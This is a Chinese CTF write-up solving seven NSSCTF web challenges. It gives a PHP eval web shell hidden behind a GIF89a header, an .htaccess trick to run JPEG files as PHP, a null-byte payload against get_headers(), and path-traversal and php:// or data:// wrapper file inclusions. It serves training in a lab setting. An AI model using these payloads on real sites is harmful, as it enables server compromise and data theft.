NSSCTF之Web篇刷题记录(13)

NSSCTF之Web篇刷题记录[12]

    • [GXYCTF 2019]BabyUpload:
    • [GKCTF 2020]cve版签到:
    • [HCTF 2018]Warmup:
    • [GDOUCTF 2023]泄露的伪装:
    • [羊城杯 2020]easycon:
    • [HNCTF 2022 Week1]Interesting_include:
    • [HNCTF 2022 Week1]easy_upload:

NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag都改为NSSCTF

[GXYCTF 2019]BabyUpload:

NSSCTF之Web篇刷题记录(13)_第1张图片

先传了一个一句话木马然后过滤了上传一个.htaccess文件 AddType application/x-httpd-php .jpeg(将.jpeg文件解析为php文件)

NSSCTF之Web篇刷题记录(13)_第2张图片

NSSCTF之Web篇刷题记录(13)_第3张图片
这里我们可以解析jpeg后 继续上传一个一句话木马的jpeg 但是 这里还有过滤(诶,别蒙我啊,这标志明显还是php啊)修改为:

GIF89a  
<script language="php">eval($_POST['cmd']);</script>

NSSCTF之Web篇刷题记录(13)_第4张图片

然后蚁连接在根目录下看到flag

NSSCTF之Web篇刷题记录(13)_第5张图片

NSSCTF之Web篇刷题记录(13)_第6张图片

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到:

NSSCTF之Web篇刷题记录(13)_第7张图片
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞(\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断 说我们url请求必须包含.ctfhub.com F12 提示flag在本地,还告诉了我们主机名必须以123结尾

NSSCTF之Web篇刷题记录(13)_第8张图片
Payload:?url=http://127.0.0.123%00www.ctfhub.com

NSSCTF之Web篇刷题记录(13)_第9张图片

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup:

NSSCTF之Web篇刷题记录(13)_第10张图片
NSSCTF之Web篇刷题记录(13)_第11张图片


    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
"
; } ?>

文件包含 Payload:file=hint.php?../../../../../ffffllllaaaagggg

NSSCTF之Web篇刷题记录(13)_第12张图片
NSSCTF之Web篇刷题记录(13)_第13张图片

NSSCTF{c5a0500a-bc52-40e2-b4e4-6155dc4ba55e}

[GDOUCTF 2023]泄露的伪装:

使用dirsearch 扫到了www.rar 打开文档有个路径 进行访问 然后就是代码审计

NSSCTF之Web篇刷题记录(13)_第14张图片
NSSCTF之Web篇刷题记录(13)_第15张图片
NSSCTF之Web篇刷题记录(13)_第16张图片

文件包含 根据代码审计以及file_get_contents读取文件内容函数我们可以知道我们需要传入一个文件,这里可以利用data://伪协议

Pyload:orzorz.php?cxk=data://text/plain,ctrl

NSSCTF之Web篇刷题记录(13)_第17张图片

NSSCTF{33af9a1f-f959-4d87-bdd0-e82ed1087876}

[羊城杯 2020]easycon:

一个Ubuntu默认页面访问index.php,提示eval post cmd应该是有一句话
直接蚁剑连接 成功连接 发现bbbbbbbbb.txtBase64转图片

NSSCTF之Web篇刷题记录(13)_第18张图片
NSSCTF之Web篇刷题记录(13)_第19张图片
NSSCTF之Web篇刷题记录(13)_第20张图片

Base64转图片:https://tool.jisuapi.com/base642pic.html

NSSCTF之Web篇刷题记录(13)_第21张图片

NSSCTF{do_u_kn0w_c@idao}

[HNCTF 2022 Week1]Interesting_include:

NSSCTF之Web篇刷题记录(13)_第22张图片
直接文件包含flag.php使用伪协议?filter=php://filter/convert.base64-encode/resource=flag.php Base64解码即可。
在这里插入图片描述

NSSCTF{57b43a46-bd1c-4a2e-b15d-5bccff598016}

[HNCTF 2022 Week1]easy_upload:

直接上传一句话木马 然后WebShell工具连接即可。

NSSCTF之Web篇刷题记录(13)_第23张图片
NSSCTF之Web篇刷题记录(13)_第24张图片
NSSCTF之Web篇刷题记录(13)_第25张图片

NSSCTF{fd2184bf-1b85-4a1f-87a2-5beab899b5d0}

你可能感兴趣的:(CTF,前端,php,开发语言)